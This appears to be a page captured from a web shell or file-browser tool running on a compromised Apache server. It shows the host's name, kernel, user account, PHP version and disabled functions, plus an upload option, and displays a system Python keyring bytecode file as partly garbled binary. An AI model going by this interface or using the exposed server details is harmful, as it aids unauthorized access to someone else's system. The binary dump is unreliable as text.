HEX
Server: Apache
System: Linux scp1.abinfocom.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: confeduphaar (1010)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //lib/python3/dist-packages/keyring/backends/__pycache__/null.cpython-38.pyc
U

ܦ�\X�@s ddlmZGdd�de�ZdS)�)�KeyringBackendc@s&eZdZdZdZddd�ZeZZdS)�Keyringzu
    Keyring that return None on every operation.

    >>> kr = Keyring()
    >>> kr.get_password('svc', 'user')
    ���NcCsdS)N�)�self�serviceZusernameZpasswordrr�7/usr/lib/python3/dist-packages/keyring/backends/null.py�get_passwordszKeyring.get_password)N)�__name__�
__module__�__qualname__�__doc__Zpriorityr	Zset_passwordZdelete_passwordrrrrrs
rN)Zbackendrrrrrr�<module>s